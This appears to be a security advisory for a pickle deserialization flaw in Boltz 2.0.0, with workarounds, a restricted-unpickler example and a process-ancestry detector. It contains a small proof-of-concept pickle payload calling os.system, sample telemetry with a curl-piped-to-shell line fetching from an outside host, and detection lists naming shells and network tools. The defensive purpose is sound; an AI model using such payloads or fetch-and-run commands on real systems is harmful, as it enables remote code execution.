CVE-2025-70560

8.4 HIGH

📋 TL;DR

Boltz 2.0.0 loads molecule data files with pickle.load() and no validation (src/boltz/data/mol.py, line 80). Because unpickling executes whatever callables the file references, a crafted pickle runs arbitrary code with the privileges of the boltz process. An attacker who can place a file in a directory that boltz processes gets code execution on the host; this affects every Boltz 2.0.0 deployment that loads molecule files from untrusted or writable locations.

💻 Affected Systems

Products:
  • Boltz
Versions: 2.0.0
Operating Systems: All platforms running Python
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in default configuration when loading molecule data files via pickle deserialization.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the boltz process, potentially leading to data theft, lateral movement, or persistence establishment.

🟠

Likely Case

Code execution as the account running boltz wherever boltz processes files from network shares, shared scratch directories, or user-uploaded input directories; this becomes privilege escalation when boltz runs under a more privileged account than the users who can write those files.

🟢

If Mitigated

Limited impact if file access is restricted to trusted sources and boltz runs with minimal privileges.

🌐 Internet-Facing: MEDIUM - Risk exists if boltz web interfaces or APIs accept file uploads, but direct internet exposure is not typical for molecular modeling software.
🏢 Internal Only: HIGH - Internal users with file upload capabilities or access to shared directories can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires file placement capability; Python pickle exploits are well-documented and easy to weaponize.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: https://github.com/jwohlwend/boltz/issues/600

Restart Required: No

Instructions:

No official patch available. Monitor GitHub repository for updates and apply when released.

🔧 Temporary Workarounds

Disable pickle loading

all

Pickle cannot be made safe by inspecting or validating the molecule file before calling pickle.load(): unpickling executes the callables the file names. Replace the pickle.load() call in src/boltz/data/mol.py (line 80) with a serialization format that carries no code (for example JSON of the molecule fields), or, if the file format cannot change yet, load through a pickle.Unpickler subclass whose find_class() rejects every module and class outside an explicit allowlist. Where neither is practical, disable loading of molecule files that were not produced by a trusted process.

Edit src/boltz/data/mol.py line 80 so the molecule file is loaded through a restricted Unpickler or a non-executable format instead of a bare pickle.load()
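As an added example of the two defences just described (not Boltz's own code and not a patch for mol.py), the Python below places the unrestricted loader pattern this advisory describes beside a static opcode scan that lists every global a pickle would import without executing it, and a restricted Unpickler whose find_class() refuses anything outside an allowlist. The allowlist contents, the molecule dict layout and the _Exploit payload are constructed for the example; real Boltz molecule files reference their own classes, which you would have to audit and add before such a loader accepts them.

```python
import io
import os
import pickle
import pickletools

# Globals a molecule pickle is permitted to reference. Pure-data pickles
# (dict, list, str, float) reference no globals at all; extend this set
# only with classes you have audited. The entries here are an assumption
# for the example, not Boltz's actual file schema.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}

# Opcodes that push a unicode string; STACK_GLOBAL (protocol 4+) consumes
# the two most recent ones as (module, name).
_UNICODE_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def load_molecule_unsafe(path):
    """The pattern this advisory describes (reconstructed, not Boltz's own
    code): unpickling a file with no restrictions. A crafted file runs
    arbitrary callables during load, so this is never called on the
    malicious payload below."""
    with open(path, "rb") as fh:
        return pickle.load(fh)


def referenced_globals(data: bytes) -> set[tuple[str, str]]:
    """Statically list every (module, name) the pickle would import by
    walking its opcode stream; nothing in the pickle is executed."""
    found = set()
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                 # protocol <= 3: "module name"
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name == "STACK_GLOBAL":         # protocol 4+: two pushed strings
            if len(recent_strings) < 2:
                raise pickle.UnpicklingError("malformed STACK_GLOBAL")
            found.add((recent_strings[-2], recent_strings[-1]))
        elif op.name in _UNICODE_OPS:
            recent_strings.append(arg)
    return found


def is_pickle_safe(data: bytes, allowed=frozenset(ALLOWED_GLOBALS)) -> bool:
    """True only if every global the pickle references is allowlisted."""
    try:
        return referenced_globals(data) <= allowed
    except (pickle.UnpicklingError, ValueError):   # truncated or malformed stream
        return False


class RestrictedUnpickler(pickle.Unpickler):
    """Runtime guard: every global lookup goes through find_class, so a
    forbidden module/class is refused before it can be called."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"forbidden global {module}.{name} in molecule pickle")


def safe_loads(data: bytes):
    # Static scan first so a forbidden import is rejected before any opcode
    # runs; the restricted unpickler is the second line of defence.
    if not is_pickle_safe(data):
        raise pickle.UnpicklingError("pickle references forbidden globals")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_loads(data: bytes):
    """(True, object) on success, (False, reason) when the pickle is refused."""
    try:
        return True, safe_loads(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# --- constructed inputs for the example (not real Boltz data) ------------

class _Exploit:
    # __reduce__ tells pickle how to rebuild the object: by calling
    # os.system("echo pwned"). A bare pickle.load() would run that command.
    def __reduce__(self):
        return (os.system, ("echo pwned",))


def make_malicious_payload() -> bytes:
    return pickle.dumps(_Exploit(), protocol=4)


def make_benign_payload() -> bytes:
    molecule = {"name": "aspirin", "smiles": "CC(=O)Oc1ccccc1C(=O)O",
                "coords": [[0.0, 1.2, 3.4], [1.1, 0.0, 2.2]]}
    return pickle.dumps(molecule, protocol=4)


if __name__ == "__main__":
    print(referenced_globals(make_malicious_payload()))  # {('posix', 'system')} on Linux
    print(try_safe_loads(make_malicious_payload())[0])   # False
    print(try_safe_loads(make_benign_payload())[0])      # True
```

Both checks only control which globals the pickle can resolve; they do not stop a pickle crafted to exhaust memory or CPU, and a generous allowlist can reintroduce gadget classes. Moving the on-disk format off pickle removes the bug class entirely and is the fix to prefer when the file format can change.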

Restrict file access

linux

Run boltz as a dedicated unprivileged account (assumed below to be user and group boltz) and give it read-only access to a root-owned directory of trusted molecule files, so that nobody who can reach the host as an ordinary user can drop a pickle where boltz will load it. The directory needs the execute bit to remain traversable, so permissions go on the directory and its files separately:

chown -R root:boltz trusted_molecule_files/
chmod 750 trusted_molecule_files/      # group boltz can list and read the directory, not write to it
chmod 640 trusted_molecule_files/*     # files readable by group boltz, writable only by root

🧯 If You Can't Patch

  • Run boltz as a dedicated non-root user with no write access to its own input directories and no unnecessary capabilities
  • Load molecule files only from allowlisted, root-owned, read-only locations; content validation cannot make pickle.load() safe, so the control has to be on who can write the files

🔍 How to Verify

Check if Vulnerable:

Confirm the installed version is 2.0.0 and inspect src/boltz/data/mol.py around line 80: an unguarded pickle.load() on a molecule file path taken from user input or from a scanned input directory is the vulnerable code path.

Check Version:

pip show boltz | grep -i '^version'
python -c "from importlib.metadata import version; print(version('boltz'))"

Verify Fix Applied:

Confirm that the molecule loader in src/boltz/data/mol.py no longer calls pickle.load() on untrusted files (replaced by a non-executable format or a restricted Unpickler with an explicit allowlist), then re-run the version check once a release that ships the fix is available.

📡 Detection & Monitoring

Log Indicators:

  • Shells, interpreters or network utilities spawned as children of the python process running boltz (a payload that calls os.system() appears as a /bin/sh -c child)
  • boltz opening molecule pickle files from world-writable, user-writable or otherwise unexpected paths (auditd or EDR file-open events)

Network Indicators:

  • Unexpected outbound connections from boltz process

SIEM Query:

parent_process_cmdline:*boltz* AND process_name:(sh OR bash OR dash OR curl OR wget OR nc)

Boltz runs as a Python console script, so the parent to match is the python interpreter whose command line contains boltz, not a process named boltz; adapt field names and the child list to your SIEM.
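The same detection expressed as standalone logic, added here as an example and not part of the original advisory: the Python below rebuilds process ancestry from constructed JSON process events and flags any shell or network tool that descends from a boltz run, so a grandchild such as sh -> curl is caught as well as the direct child. The event schema (pid, ppid, name, cmdline), the sample events and the suspicious-child list are assumptions for the example.

```python
import json
import shlex

# Executables a molecular-modelling job should never spawn. Constructed
# list for this example; tune it to what your boltz hosts legitimately run.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc",
                       "ncat", "socat", "perl", "base64"}


def parse_events(jsonl: str) -> list[dict]:
    """One JSON object per line with pid, ppid, name and cmdline fields
    (an assumed schema; map your EDR or auditd fields onto it)."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def is_boltz_process(event: dict) -> bool:
    """Boltz is a Python console script: the image is python and 'boltz'
    appears as the script argument, so match on the command line."""
    argv = shlex.split(event.get("cmdline", ""))
    return any(arg == "boltz" or arg.endswith("/boltz") for arg in argv)


def has_boltz_ancestor(event: dict, by_pid: dict) -> bool:
    """Walk ppid links so grandchildren (sh -> curl) are caught too."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        if is_boltz_process(parent):
            return True
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return False


def find_suspicious_spawns(events: list[dict]) -> list[dict]:
    """Return one alert per shell or network process descended from boltz."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["name"] in SUSPICIOUS_CHILDREN and has_boltz_ancestor(e, by_pid):
            alerts.append({"pid": e["pid"], "name": e["name"],
                           "cmdline": e["cmdline"]})
    return alerts


# Constructed sample telemetry (not real logs). 4002/4003 model a pickle
# payload calling os.system("curl ... | sh"); 4011 is a benign GPU probe
# under a second boltz run; 5000 is an unrelated interactive shell.
SAMPLE_EVENTS = """\
{"pid": 4001, "ppid": 1, "name": "python3", "cmdline": "/opt/venv/bin/python /opt/venv/bin/boltz predict ./inputs"}
{"pid": 4002, "ppid": 4001, "name": "sh", "cmdline": "/bin/sh -c 'curl -s http://198.51.100.7/s | sh'"}
{"pid": 4003, "ppid": 4002, "name": "curl", "cmdline": "curl -s http://198.51.100.7/s"}
{"pid": 4010, "ppid": 1, "name": "python3", "cmdline": "/opt/venv/bin/python /opt/venv/bin/boltz predict ./other"}
{"pid": 4011, "ppid": 4010, "name": "nvidia-smi", "cmdline": "nvidia-smi --query-gpu=memory.used --format=csv"}
{"pid": 5000, "ppid": 1, "name": "bash", "cmdline": "bash -l"}
"""

if __name__ == "__main__":
    for alert in find_suspicious_spawns(parse_events(SAMPLE_EVENTS)):
        print(alert)   # the sh (4002) and curl (4003) events
```

Matching on the parent command line rather than a process name is the point the query above depends on; a rule keyed on parent_process_name:"boltz" would never fire, because the image on disk is the Python interpreter.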
